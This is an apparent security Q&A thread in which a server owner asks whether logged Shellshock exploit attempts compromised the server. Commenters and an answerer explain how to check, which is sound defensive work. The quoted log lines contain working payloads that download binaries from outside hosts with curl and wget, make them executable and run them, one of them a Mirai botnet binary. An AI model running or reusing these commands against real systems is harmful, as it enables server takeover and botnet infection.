1

I am wondering if my server is compromised or not. I just looked at my log and seen the following line in there:

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

I am not sure if they were able to execute that command successfully or not. I shut my server off.

  • If you're logging DNS requests anywhere, you could see if this machine tried to resolve any of those domains in the second string. If it attempted resolution, the strings were executed. – Ivan Jan 19 '18 at 20:21
  • Why will it need to resolve the domains if the domain name isn't given . It's simple IP address – Bruteforce Jan 21 '18 at 05:33
  • it clearly intends to resolve a domain name in the second command. If successful, wget hxxp://easavi.gq is going to result in a DNS request. – Ivan Jan 22 '18 at 19:34

1 Answers1

3

While one can see from the server log that an exploit was attempted using the Shellshock vulnerability it is impossible to say based on this log alone if the exploit was successful.

Your first check should probably be to find out if your system is vulnerable against this kind of exploit at all. This should not be the case if your system has current updates. If your system is vulnerable then you should treat it as compromised, no matter if from the recent exploit attempts or from older attempts since the bug is known and exploited for a long time.

Steffen Ullrich
  • 190,458
  • 29
  • 381
  • 434